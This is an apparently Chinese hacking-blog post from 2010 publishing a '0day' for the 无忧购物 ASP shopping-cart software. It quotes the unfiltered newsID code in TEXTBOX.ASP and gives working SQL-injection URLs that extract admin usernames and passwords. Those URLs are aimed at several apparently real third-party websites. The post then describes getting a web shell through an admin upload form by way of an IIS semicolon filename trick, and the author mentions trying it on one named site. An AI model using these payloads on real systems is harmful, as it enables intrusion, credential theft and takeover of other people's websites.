无忧购物时尚ASP版 oday

2010, July 16, 7:01 PM. 漏洞分析
Submitted by admin

FROM http://www.st999.cn 

by 流浪的风

程序:无忧购物时尚ASP版

跟网趣一样的找回密码漏洞,username未过滤,导致注入发生,这里就不演示了,网趣的这个漏洞挺老的了。

另外一个跟shopxp一样的TEXTBOX.ASP存在注入漏洞

Action=LCase(Request.QueryString("Action"))
newsID=Request.QueryString("newsID")

If request("action")="modify" Then
set rs=server.createobject("adodb.recordset")
sql="select * From shop_zhuanti where newsid="&newsid
rs.open sql,conn,1,1
 If Not rs.Eof Then
  Content=rs("Content")
 End If
 Response.Write Content
End If

newsid并未过滤,直接代入执行sql。

利用:

http://192.168.1.106/TEXTBOX.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,3,admin%2bpassword,5,6,7,8%20from%20shop_admin

 

http://www.wy1314.com/wyshop/TEXTBOX.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,3,admin%2bpassword,5,6,7,8%20from%20shop_admin


http://www.tsjbb.com/TEXTBOX.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,3,admin%2bpassword,5,6,7,8%20from%20shop_admin


http://www.gdwndq.com/wyshop/TEXTBOX.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,3,admin%2bpassword,5,6,7,8%20from%20shop_admin

 

拿到用户名和密码,解密,进入后台,找上传点,存在着上传漏洞,直接拿shell。

进入后台,商品管理-商品添加-上传小图片,(广告管理-广告设置这里也有个上传点)在弹出的窗口中,查看源码,在action前面直接添加网站域名,并在后面

<input type="hidden" name="filepath" value="shoppic/st999.asp;aaa/">

把filepath的值修改为st999.asp;aaaa/

本地保存并上传,再查看源码就OK了

我就不搞了,刚刚本地试验还成功来着,http://www.tsjbb.com/这个就不成功了,提示写入失败,郁闷。。。

也不截图什么的了,老婆催了,出去玩了。。。

Tags: 无忧, oday

« 上一篇 | 下一篇 »

只显示10条记录相关文章
无忧购物系统ASP时尚版存在后门 (浏览: 13940, 评论: 0)
ecshop最新版(v272) 本地包含漏洞ODAY(鸡肋) (浏览: 15840, 评论: 0)
无忧购物系统ASP通用版 V2010.9.17 ---- 上传漏洞 (浏览: 9946, 评论: 0)
无忧购物系统ASP时尚版上传漏洞 (浏览: 9888, 评论: 0)
V5-SHOP商城0day (浏览: 9257, 评论: 0)
ECSHOP 2.7.X注入漏洞_20100507 (浏览: 15849, 评论: 0)
最新DVBBS8.0以上版本后台提升webshell 0day (浏览: 11535, 评论: 0)
良精所有产品通杀 (浏览: 8681, 评论: 0)
无忧购物系统oday发布 (浏览: 8529, 评论: 0)
shopwind oday 分析 (浏览: 8872, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):